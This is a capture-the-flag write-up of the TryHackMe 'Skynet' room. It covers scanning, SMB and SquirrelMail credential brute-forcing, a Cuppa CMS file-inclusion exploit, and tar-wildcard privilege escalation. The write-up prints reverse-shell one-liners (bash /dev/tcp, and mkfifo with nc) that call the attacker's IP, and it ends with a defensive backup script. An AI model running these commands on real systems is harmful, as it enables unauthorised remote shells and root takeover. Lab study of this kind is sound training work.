. . .

Introduction

This room has its own writeup by TryHackMe, which can be found here.
Since I usually blog here while I pop machines, let’s see where this one goes.

. . .

Scanning & Enumeration

Attacker IP: 10.4.9.255
Target IP: 10.10.107.116 | Note: This may change as I do not complete one machine in a single sitting.

Nmap Scan

> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:02 IST
Nmap scan report for 10.10.107.116
Host is up (0.41s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL TOP PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 capabilities more ENABLE post-login LITERAL+ SASL-IR IDLE LOGINDISABLEDA0001 LOGIN-REFERRALS listed have Pre-login OK ID
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=35749%PV=Y%DS=4%DC=T%G=Y%TM=5F2F1A0D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2020-08-08T16:32:48-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-08T21:32:48
|_  start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   158.06 ms 10.4.0.1
2   ... 3
4   412.76 ms 10.10.107.116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 seconds
--------------------------------------------------------------------

From the results above, let us populate our Service Version Enumeration Table.

Service Version Enumeration Table

Enumeration

HTTP Enumeration

Landing Page

We check the source code, nothing there.

Let’s try Gobuster.

gobuster dir -u http://10.10.107.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
gobuster results

We see a couple of 301s. 301 stands for Moved Permanently, so let us try to visit these URLs. ‘/admin’ looks the juiciest of all.

403 — Stands for Forbidden, and is returned when we do not have permission to view them

We get similar 403s for the rest, except ‘/squirrelmail’.

SquirrelMail Login Page

The first thing I do when I see a login page is try to log in using admin:admin. That was not the right credential. We can Google whether there are any default passwords for SquirrelMail.

No default user password

At this point, we have not observed any user yet, and thus trying to use hydra would be too tiresome. Let us look at other services.

Key Takeaways:
SquirrelMail Version — 1.4.23

SMB Enumeration

We use SMBMap to enumerate the samba shares on the server.

anonymous access

We see that we have READ ONLY access to the anonymous share.
We also notice the share ‘milesdyson’, but we have no access to it.

Contents of the Anonymous Share

We see a file called ‘attention.txt’, well you have all my attention :P
Let’s get the file and see what’s inside.

Contents of Attention.txt

This suggests two things:
1. Passwords are being changed by a lot of people using Skynet. We saw two more folders besides ‘attention.txt’, so the next place to look is ‘logs’.
2. There is a person named Miles Dyson, whose username might be miles.

List of Logs

Since this is a machine intended to be vulnerable, we see only 3 logs; had this been a real environment, there would be a lot of logs!

We notice that the size of log2.txt and log3.txt is 0. Let’s see the contents of log1.txt.

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

It has a list of words. One of them is likely our password: the machine is based on Terminator, and the user must be a fan of the movie.

We noticed the ‘milesdyson’ share on Samba, so let us see if we can brute force it as user ‘miles’.

https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

I found this website which has different hydra-brute-force techniques.

Source: https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

Since we need to brute-force on smb, let’s use this.

Did not work

This did not work. So I thought of writing a script.

Bruteforce Script

But we find that none of them is the password to access the samba shares.

Well, we can try to brute force the SquirrelMail login that we found above.

SquirrelMail

We capture the request in Burp and try to brute-force using intruder.

Post Request in Burpsuite
Adding Intruder Payload for Password Bruteforce

After running the attack, I couldn’t find a response that differed from the others. Let us see if there are any online tools that might help us. I found https://github.com/04x/SquirrelMail-BruteForce

BruteForce Script Usage

We see the usage information, and running it did not work as expected.

I am not sure why the intruder did not work. Maybe because I did not provide the correct username? Maybe… Well, what can be the username now? Maybe ‘milesdyson’, why? Because we saw a share with the same name.

Intruder Payload with another username

After running the attack, in the results tab we find one response with a different length and a status of 302 instead of the normal 200.

Intruder Results

I was able to login using the credentials.

Squirrel Mail Dashboard

Once we log in, we see 3 different emails, of which “Samba Password reset” obviously looks a lot more important than the others with no subject.

Sensitive Email containing Password

We find the new password for our samba share.

Revisiting Samba

This time we have the password. Using it to log in, I see a folder called “notes”.

"notes" found in Samba Share

The folder contains a lot of files, but the most important looks to be “important.txt”.

Contents of important.txt

Another URL is exposed.

Revisiting HTTP

With the newly found URL, we are back at enumerating the HTTP.

Landing Page

We see Miles Dyson’s personal page and viewing the source code doesn’t help. It’s gobuster time!!

gobuster dir -u http://10.10.169.147/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Gobuster Output

We find ‘/administrator’.

This exposes Cuppa CMS.

Cuppa CMS Landing Page

I tried to log in using different credentials. None worked. So I searched on Searchsploit if Cuppa CMS has any known vulnerabilities.

. . .

Vulnerability Analysis

The first step is to search whether searchsploit has any entries for Cuppa CMS.

Searchsploit Results

Let us copy this file to our working directory and read its contents.

We see that it is vulnerable to PHP code injection, and that the vulnerability exists because of the use of ‘include’ on user-supplied input, which is known as a File Inclusion vulnerability. A little later we see that this file inclusion can be local as well as remote.

Exploit Code showing exploit url options

Let us try and see if we can use the second one first.

Contents of /etc/passwd

Let us upload a PHP reverse shell remotely which once included will give us a full shell on the target machine.

. . .

Exploitation

Let us get the PHP reverse shell from Pentest Monkey, http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Modify the script to include the attacker IP and the port that our listener will wait on.

Once that is done:

  1. Start the web server on our local machine and the netcat listener
  2. On the target, pass the URL of the reverse shell to the vulnerable include
Initial Shell with User Privileges

Now that we have our initial shell, let’s privesc :D

. . .

Privesc

Let us run ‘linpeas.sh’ on the target machine. ( Transfer the linpeas.sh over HTTP and download using wget)

While it ran, I saw that the sudo version was ‘sudo 1.8.16’, which was vulnerable; there was a blog on this.

But it required that I knew the password for www-data, which I obviously did not know.

I thought of changing my user to ‘milesdyson’ using the password that we enumerated.

Login using Miles Dyson

It worked, but the exploit still did not. So I continued to keep looking.

LinPEAS Output suggesting an escalation vector

According to the LEGEND, this can be a PE vector with a probability of 99%. We will take a look at that in a minute.

backup.sh is owned by root and can be executed by anyone. Inside it we see that the command ‘tar’ is being used. Since it is the only command inside, I think we need to leverage that somehow. Let’s search on GTFOBins.

It does give some results, but I was not sure how I could use them, so I looked at the solution provided by TryHackMe. There I found this blog, which talks about exploiting wildcards on Linux.

Blog Snippet
Quote from the blog

Hmmmm… Interesting. This is something really new and the point where everyone thought of using * as a feature and not a bug is one of the classic bug/feature jokes ever!

knowledge - 1
knowledge - 2

Now that we know this, we are required to do the following:
1. Create these fake files
2. Execute some commands as root which can be written inside shell.sh.

Let’s do this.

We saw that the root folder was ‘/var/www/html/’

This gives us an error. Why? Because I had logged in as milesdyson. Running exit once will bring us back to ‘www-data’ who is the owner of the directory. Now we can go ahead and create the files.

Let us try adding this bash reverse shell inside the shell.sh

bash -i >& /dev/tcp/10.4.9.255/1337 0>&1

Just adding this did not work, but the one below, did!

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.9.255 1337 >/tmp/f" > shell.sh

And, we got root!

Shell with root privileges
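As an added example (not the room’s backup.sh, whose contents appear only in the screenshots above), here is how the same backup could be written so that tar never receives a filename as an option, together with a check a defender can run over the directory being backed up. The directory and file names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not the room's backup.sh): a tar backup that never lets a
# filename reach tar as an option, plus a check that flags option-looking names.
# The directory and file names used here are assumptions for illustration.

# Print how many entries in directory $1 have names starting with '-'.
# Once a bare "tar cf backup.tgz *" expands the glob, such a name is parsed by
# tar as an option instead of a file: that is the wildcard weakness above.
count_option_like_names() {
    dir=$1
    n=0
    for entry in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$entry" ] || continue          # skip unmatched glob patterns
        case ${entry##*/} in
            -*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Archive directory $1 into $2 without any shell glob: tar is given the
# directory itself ('.') via -C, so no filename is ever a command-line argument.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# Count the members of archive $1; a '-'-named file shows up as './-name',
# i.e. as data that was archived, not as an option that was acted on.
archive_member_count() {
    tar -tf "$1" | grep -c '^\./.'
}

# Stand-alone demo on a constructed directory.
demo_dir=$(mktemp -d)
: > "$demo_dir/notes.txt"
: > "$demo_dir/-badname"      # constructed option-looking filename
echo "option-like names: $(count_option_like_names "$demo_dir")"
safe_backup "$demo_dir" "$demo_dir.tar"
echo "archived members:  $(archive_member_count "$demo_dir.tar")"
rm -rf "$demo_dir" "$demo_dir.tar"
```

Running the check from cron against the backup source directory gives an early warning that someone who can write there has planted option-looking names.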
. . .

Summary | TL;DR

  1. Scan ports using nmap
  2. Enumerate Samba and get password list from the network share
  3. Enumerate HTTP, use the password list to brute force. Check email. Get authentication for Samba
  4. Find hidden URL from Samba, get the CMS
  5. CMS has a public vulnerability, exploit that to get a local shell
  6. Privesc using the tar wildcard vulnerability
. . .

Parting Thoughts

In this machine, we learned the following:

  1. How enumeration is key, and that we may need to repeatedly enumerate services with each new piece of information we find
  2. A crazy privesc vector.

Thank you for reading, please provide your feedback and share with people who are in need. :)

. . .